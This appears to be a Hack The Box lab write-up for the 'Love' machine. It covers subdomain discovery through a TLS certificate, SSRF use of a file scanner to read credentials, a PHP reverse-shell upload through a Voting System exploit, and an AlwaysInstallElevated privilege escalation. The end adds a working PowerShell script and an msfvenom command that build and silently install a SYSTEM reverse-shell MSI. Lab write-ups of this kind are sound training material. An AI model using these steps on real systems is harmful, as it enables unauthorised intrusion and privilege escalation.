Love is an Easy box from HTB created by pwnmeow. This box features subdomain discovery via a TLS certificate and an AlwaysInstallElevated privesc. I start every scan with a RustScan and convert it to a PDF for easier viewing. This is bundled into my setup.sh script, which I’ve mentioned in a few of my other posts. RustScan with NMAP filters shows a website with registration available on port 80. I also notice port 443 is open, so I navigate over to the HTTPS version of the website, where the certificate contains some useful information.

Port 80 showing the Voting System screen.

HTTPS certificate showing some useful information.
The certificate reveals a subdomain, so I add both the primary domain and the subdomain to my hosts file.

Adding the sub-domain to my hosts file.

I also note down the [email protected] address as a possible username and ValentineCorp as a possible company. I visit both domains over HTTPS and get a response from the staging website.

Staging File Scanner website.
At the top of the screen a Demo link is available. I set up a nc listener, point the scanner at it and click Scan file, and get a hit back on the listener: the scanner fetches the URL it is given from the server side, so code execution via RFI, traversal or SSRF might be possible. After striking out for a few minutes my NMAP scan finishes. Reviewing the results I notice that port 5000 is running a website and returning a 403 error to my direct requests.

Port 5000 showing a 403 error.

Since the file scanner makes its requests from the target itself, I use it to fetch the port 5000 page and pick up the credentials for the voting system.

Free File Scanner shows the Password Dashboard.
I note down the credentials and head over to the voting page. Upon logging in I note the name of the user we are logged in as and notice the copyright for the site says 2018. As this box came out in 2021 we can assume this is intentional, and a quick search for the Voting System software turns up an ExploitDB entry.

Google showing me the way…

After reviewing the ExploitDB article I was unable to get a response from the published exploit, so I tried the exploit manually instead, which worked.

Creating a new malicious candidate.

I created a candidate and uploaded a shell.php, which is a fork of the PenTestMonkey PHP reverse shell. To catch the shell I set up a nc listener.
Once on the system I grab the user flag, create a directory under Windows\Temp and download WinPEAS to the box. The scan comes back reporting that AlwaysInstallElevated is enabled.

WinPEAS showing AlwaysInstallElevated.

I kill the session for the PHP shell and change its port to 9001. This is because my setup script creates MSFVenom shells that default to port 1234, and I want that port free for the MSI payload. I alter the PHP shell, get back into the environment and then pull over the .MSI shell to perform the privilege escalation.
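The AlwaysInstallElevated check and the MSI install, written out as an added PowerShell example that is not from the original post. It assumes the MSI has already been staged at C:\Windows\Temp\shell.msi (the post's own temp directory; the file name is an assumption) and that the target is 64-bit; the msfvenom line in the comment is the standard way to build such a package and uses the post's default port of 1234.

```powershell
# Added example, not from the original post: confirm AlwaysInstallElevated on the target,
# then install an attacker-supplied MSI through msiexec. Path and MSI name are assumptions.
$keys = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

# The policy is only exploitable when BOTH the machine and the user value are 1;
# one of them alone does nothing, so check each key explicitly.
$enabled = $true
foreach ($k in $keys) {
    $v = (Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    Write-Output ("{0}\AlwaysInstallElevated = {1}" -f $k, $(if ($null -eq $v) { '<missing>' } else { $v }))
    if ($v -ne 1) { $enabled = $false }
}

if (-not $enabled) {
    Write-Output 'AlwaysInstallElevated is not fully enabled; this privesc does not apply.'
    return
}

# shell.msi was built on the attack box, e.g.:
#   msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-ip> LPORT=1234 -f msi -o shell.msi
# and copied into C:\Windows\Temp (the staging directory used in the post).
# Start the nc listener on the attack box before running the installer.
$msi = 'C:\Windows\Temp\shell.msi'
if (-not (Test-Path $msi)) {
    Write-Output "MSI not found at $msi; stage it first."
    return
}

# /quiet /qn suppresses the installer UI; with AlwaysInstallElevated the package's
# custom action runs as NT AUTHORITY\SYSTEM, which is what delivers the elevated shell.
Start-Process -FilePath 'msiexec.exe' -ArgumentList "/quiet /qn /i `"$msi`"" -Wait
```

Checking both keys first matters because WinPEAS and similar tools will flag the setting when either value is present; the Windows Installer only honours it when the HKLM and HKCU values are both set to 1.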